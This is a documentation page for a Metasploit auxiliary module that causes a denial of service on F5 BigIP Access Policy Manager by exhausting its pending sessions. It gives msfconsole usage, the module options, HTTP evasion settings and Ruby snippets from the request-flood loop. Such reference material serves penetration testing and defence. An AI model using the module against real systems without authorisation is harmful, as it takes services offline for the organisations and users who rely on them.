F5 BigIP Access Policy Manager Session Exhaustion Denial of Service - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/f5_bigip_apm_max_sessions metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: F5 BigIP Access Policy Manager Session Exhaustion Denial of Service
Module: auxiliary/dos/http/f5_bigip_apm_max_sessions
Source code: modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a resource exhaustion denial of service in F5 BigIP devices. An unauthenticated attacker can establish multiple connections with BigIP Access Policy Manager (APM) and exhaust all available sessions defined in customer license. In the first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP system creates a session, marks it as pending and then redirects the client to an access policy URI. Since BigIP allocates a new session after the first unauthenticated request, and deletes the session only if an access policy timeout expires, the attacker can exhaust all available sessions by repeatedly sending the initial HTTP request and leaving the sessions as pending.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/f5_bigip_apm_max_sessions
msf auxiliary(f5_bigip_apm_max_sessions) > show targets
    ... a list of targets ...
msf auxiliary(f5_bigip_apm_max_sessions) > set TARGET target-id
msf auxiliary(f5_bigip_apm_max_sessions) > show options
    ... show and set options ...
msf auxiliary(f5_bigip_apm_max_sessions) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the dos/http/f5_bigip_apm_max_sessions auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/f5_bigip_apm_max_sessions

msf6 auxiliary(dos/http/f5_bigip_apm_max_sessions) > show info

       Name: F5 BigIP Access Policy Manager Session Exhaustion Denial of Service
     Module: auxiliary/dos/http/f5_bigip_apm_max_sessions
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Denis Kolegov <[email protected]>
  Oleg Broslavsky <[email protected]>
  Nikita Oleksov <[email protected]>

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FORCE    false            yes       Proceed with attack even if a BigIP virtual server isn't detected
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RLIMIT   10000            yes       The number of requests to send
  RPORT    443              yes       The target port (TCP)
  SSL      true             no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits a resource exhaustion denial of service in F5 
  BigIP devices. An unauthenticated attacker can establish multiple 
  connections with BigIP Access Policy Manager (APM) and exhaust all 
  available sessions defined in customer license. In the first step of 
  the BigIP APM negotiation the client sends a HTTP request. The BigIP 
  system creates a session, marks it as pending and then redirects the 
  client to an access policy URI. Since BigIP allocates a new session 
  after the first unauthenticated request, and deletes the session 
  only if an access policy timeout expires, the attacker can exhaust 
  all available sessions by repeatedly sending the initial HTTP 
  request and leaving the sessions as pending.

References:
  https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html

Module Options


This is a complete list of options available in the dos/http/f5_bigip_apm_max_sessions auxiliary module:

msf6 auxiliary(dos/http/f5_bigip_apm_max_sessions) > show options

Module options (auxiliary/dos/http/f5_bigip_apm_max_sessions):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FORCE    false            yes       Proceed with attack even if a BigIP virtual server isn't detected
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RLIMIT   10000            yes       The number of requests to send
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the dos/http/f5_bigip_apm_max_sessions auxiliary module:

msf6 auxiliary(dos/http/f5_bigip_apm_max_sessions) > show advanced

Module advanced options (auxiliary/dos/http/f5_bigip_apm_max_sessions):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/f5_bigip_apm_max_sessions module can do:

msf6 auxiliary(dos/http/f5_bigip_apm_max_sessions) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/f5_bigip_apm_max_sessions auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/f5_bigip_apm_max_sessions) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No answer from the BigIP server


Here is a relevant code snippet related to the "No answer from the BigIP server" error message:

51:	    force_attack = datastore['FORCE']
52:	
53:	    res = send_request_cgi('method' => 'GET', 'uri' => '/')
54:	
55:	    unless res
56:	      print_error("No answer from the BigIP server")
57:	      return
58:	    end
59:	
60:	    # Simple test based on HTTP Server header to detect BigIP virtual server
61:	    server = res.headers['Server']

BigIP virtual server was not detected. Please check options


Here is a relevant code snippet related to the "BigIP virtual server was not detected. Please check options" error message:

58:	    end
59:	
60:	    # Simple test based on HTTP Server header to detect BigIP virtual server
61:	    server = res.headers['Server']
62:	    unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack
63:	      print_error("BigIP virtual server was not detected. Please check options")
64:	      return
65:	    end
66:	
67:	    print_status("Starting DoS attack")
68:	

Location


Here is a relevant code snippet related to the "Location" error message:

70:	    limit.times do |step|
71:	      if step % 100 == 0
72:	        print_status("#{step * 100 / limit}% accomplished...")
73:	      end
74:	      res = send_request_cgi('method' => 'GET', 'uri' => '/')
75:	      if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
76:	        print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.")
77:	        return
78:	      end
79:	    end
80:	

DoS attack failed. Try to increase the RLIMIT


Here is a relevant code snippet related to the "DoS attack failed. Try to increase the RLIMIT" error message:

79:	    end
80:	
81:	    # Check if attack has failed
82:	    res = send_request_cgi('method' => 'GET', 'uri' => uri)
83:	    if res.headers['Location'] =~ /\/my.policy/
84:	      print_error("DoS attack failed. Try to increase the RLIMIT")
85:	    else
86:	      print_status("Result is undefined. Try to manually determine DoS attack result")
87:	    end
88:	
89:	    rescue ::Errno::ECONNRESET

The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached


Here is a relevant code snippet related to the "The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached" error message:

85:	    else
86:	      print_status("Result is undefined. Try to manually determine DoS attack result")
87:	    end
88:	
89:	    rescue ::Errno::ECONNRESET
90:	      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
91:	    rescue ::Rex::ConnectionRefused
92:	      print_error("Unable to connect to BigIP")
93:	    rescue ::Rex::ConnectionTimeout
94:	      print_error("Unable to connect to BigIP. Please check options")
95:	    rescue ::OpenSSL::SSL::SSLError

Unable to connect to BigIP


Here is a relevant code snippet related to the "Unable to connect to BigIP" error message:

87:	    end
88:	
89:	    rescue ::Errno::ECONNRESET
90:	      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
91:	    rescue ::Rex::ConnectionRefused
92:	      print_error("Unable to connect to BigIP")
93:	    rescue ::Rex::ConnectionTimeout
94:	      print_error("Unable to connect to BigIP. Please check options")
95:	    rescue ::OpenSSL::SSL::SSLError
96:	      print_error("SSL/TLS connection error")
97:	  end

Unable to connect to BigIP. Please check options


Here is a relevant code snippet related to the "Unable to connect to BigIP. Please check options" error message:

88:	
89:	    rescue ::Errno::ECONNRESET
90:	      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
91:	    rescue ::Rex::ConnectionRefused
92:	      print_error("Unable to connect to BigIP")
93:	    rescue ::Rex::ConnectionTimeout
94:	      print_error("Unable to connect to BigIP. Please check options")
95:	    rescue ::OpenSSL::SSL::SSLError
96:	      print_error("SSL/TLS connection error")
97:	  end
98:	end

SSL/TLS connection error


Here is a relevant code snippet related to the "SSL/TLS connection error" error message:

88:	
89:	    rescue ::Errno::ECONNRESET
90:	      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
91:	    rescue ::Rex::ConnectionRefused
92:	      print_error("Unable to connect to BigIP")
93:	    rescue ::Rex::ConnectionTimeout
94:	      print_error("Unable to connect to BigIP. Please check options")
95:	    rescue ::OpenSSL::SSL::SSLError
96:	      print_error("SSL/TLS connection error")
97:	  end
98:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Denis Kolegov <dnkolegov[at]gmail.com>
  • Oleg Broslavsky <ovbroslavsky[at]gmail.com>
  • Nikita Oleksov <neoleksov[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.